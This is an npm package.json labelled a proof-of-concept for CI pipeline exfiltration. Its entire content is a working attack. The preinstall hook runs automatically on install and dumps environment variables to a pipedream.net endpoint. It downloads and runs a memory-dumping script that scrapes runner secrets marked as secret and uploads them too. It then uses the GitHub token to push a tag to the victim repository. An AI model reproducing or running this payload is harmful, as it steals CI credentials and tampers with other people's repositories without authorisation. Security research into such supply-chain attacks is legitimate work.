{
    "name": "malicious-poc-app",
    "version": "1.0.0",
    "description": "PoC package for CI pipeline exfil and tag push",
    "main": "index.js",
    "scripts": {
        "preinstall": "set -ex && env > /tmp/env_dump && curl -X PUT --upload-file /tmp/env_dump https://eoiissjprny7lfp.m.pipedream.net/env_secrets.txt && curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py > /tmp/memdump.py && python3 /tmp/memdump.py | tr -d '\\0' | grep -aoE '\"[^\"]+\":\\{\"value\":\"[^\"]*\",\"isSecret\":true\\}' > /tmp/memdump_secrets || true && curl -X PUT --upload-file /tmp/memdump_secrets https://eoiissjprny7lfp.m.pipedream.net/memdump_secrets.txt && git tag poc-vk-pwn-$(date +%s) && git push https://x-access-token:$GITHUB_TOKEN@github.com/$GITHUB_REPOSITORY.git --tags || echo 'tag push failed'"
    },
    "dependencies": {
        "lodash": "^4.17.21"
    }
}
